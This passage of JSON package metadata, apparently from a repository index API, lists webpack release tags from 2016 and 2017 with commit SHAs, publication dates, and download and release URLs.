":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5